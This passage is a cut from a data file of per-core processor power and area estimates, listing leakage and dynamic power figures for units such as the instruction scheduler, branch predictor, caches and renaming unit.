'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.568674,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.326151,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.22323,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.23209,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.40904,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.114011,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0119048,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.128037,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0880436,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.242048,
'Execution Unit/Register Files/Runtime Dynamic': 0.0999484,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.340057,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.732774,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.75194,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00156835,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00156835,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.001368,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00053065,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00126475,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00576945,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0149669,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0846385,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.38374,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.227921,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.287471,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.86754,
'Instruction Fetch Unit/Runtime Dynamic': 0.620766,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0821668,
'L2/Runtime Dynamic': 0.0156952,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.31609,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.02046,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0672597,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0672597,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.635,
'Load Store Unit/Runtime Dynamic': 1.41942,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.165851,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.331702,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.058861,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0600451,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.334741,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0375123,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.594999,
'Memory Management Unit/Runtime Dynamic': 0.0975574,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 23.1504,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.397757,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.021579,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.16241,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.581746,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.48712,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0372236,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.231926,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.200027,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.134325,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.216661,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.109363,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.46035,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.122963,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.41643,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0377894,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0056342,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0547189,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0416683,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0925083,
'Execution Unit/Register Files/Runtime Dynamic': 0.0473025,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.124585,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.280169,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.42513,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00100309,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00100309,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000884701,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000348504,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000598569,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00348945,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00922419,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0400568,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.54796,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.111457,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.136051,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.89013,
'Instruction Fetch Unit/Runtime Dynamic': 0.300279,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0485163,
'L2/Runtime Dynamic': 0.0108162,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.21273,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.483896,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0315632,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0315633,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.36177,
'Load Store Unit/Runtime Dynamic': 0.671119,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0778294,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.155659,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0276219,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0283347,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.158423,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.018319,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.361981,
'Memory Management Unit/Runtime Dynamic': 0.0466537,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.6683,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0994064,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00727013,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0663866,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.173063,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.62706,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0275802,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.224352,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.148255,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.149297,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
